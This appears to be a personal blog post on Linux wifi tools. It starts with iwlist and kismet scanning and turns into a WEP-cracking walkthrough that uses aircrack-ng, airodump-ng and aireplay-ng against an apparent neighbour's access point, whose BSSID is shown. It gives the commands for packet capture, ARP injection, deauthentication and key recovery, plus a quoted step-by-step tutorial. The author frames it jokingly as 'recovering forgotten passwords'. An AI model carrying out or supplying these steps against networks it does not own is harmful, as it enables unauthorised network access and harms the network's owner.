Need To See What’s In The Radio Spectrum
Try something like this.
sudo iwlist scan sudo iwlist wlan0 scan | grep '\(ESSID\|Quality\|Address\)'
I think it’s part of the
iw package in Ubuntu.
A great text-based interactive real time wifi scanner:
sudo apt-get install kismet
Tools to… uh… recover forgotten wifi passwords.
sudo apt-get install aircrack-ng
to find out what to put in your
Example 1 (eee): wlan0 Atheros ath5k - [phy0]
Then put this in the source= definition:
Example 2 (X60s):
Maybe you need to run kismet_server first? Not sure. It is client/server oriented.
Pick the candidate AP:
SSID : 2WIRE976 Server : localhost:2501 BSSID : 00:25:3C:E0:C6:A1 Carrier : IEEE 802.11b Manuf : Unknown Max Rate: 18.0 BSS Time: 1213fd23181 Max Seen: 2000 kbps First : Fri Jun 11 21:40:25 2010 Latest : Fri Jun 11 21:40:38 2010 Clients : 0 Type : Access Point (infrastructure) Info : Channel : 8 Privacy : Yes Encrypt : WEP Decryptd: No Beacon : 25600 (26.214400 sec) Packets : 10 Data : 0 LLC : 10 Crypt : 0 Weak : 0 Dupe IV : 0 Data : 0B Signal : Power : -92 (best -90) Noise : -127 (best -127) IP Type : None detected Min Loc : N/A Max Loc : N/A Range : N/A
Try capturing some packets:
$sudo airodump-ng --bssid 00:25:3C:E0:C6:A1 --ivs -w vecinopackets --channel 8 wlan0
Try stimulating some packets to capture while capturing:
$ sudo aireplay-ng -1 0 -e 2WIRE976 -a 00:25:3C:E0:C6:A1 -h 00:DE:AD:BE:EF:01 wlan0
From the web site I’m referring to:
The one at the end lets Airodump know we only want to capture IV’s. The filename can be anything you want, and will be saved in your home directory (or whatever directory you run the command from) as filename.ivs. Copy the bssid of the wireless network from the airodump window by selecting it and pressing Shift+Ctrl+C. Open up a new terminal window so we can run aireplay to start injecting packets so our data count goes up. We want the data column in airodump to reach between 100,000 and 400,000. The more packets we have, the faster aircrack can find the WEP key. If the WEP key is 128 bits, we may need up to 1,000,000 packets. sudo aireplay -1 0 -e ESSID -a BSSID -h 0:1:2:3:4:5 ath0
This should associate the network with the wireless connection. If it
times out repeatedly, you need to be closer to the wireless router or
change your interface rate by typing
sudo iwconfig ath0 rate 1.
Next we want to start injecting packets.
sudo aireplay -3 -b BSSID -h 0:1:2:3:4:5 ath0
At first, it will only read packets, and say 0 ARP requests and 0 packets sent. Just wait a minute or two and it will start sending packets in large quantities. If it returns text that says it has been deauthorized, press Ctrl+C and run the command again. You can try to speed things up by entering this command: sudo aireplay -0 ath0 -a BSSID ath0
Otherwise just sit back and wait. As soon as packets begin to be sent, the data field in Airodump should start flying. Wait until the desired number of packets have been recieved, then open a new terminal window and run aircrack. sudo aircrack filename.ivs
After a minute, aircrack should return the WEP key. If it doesn’t, collect more packets.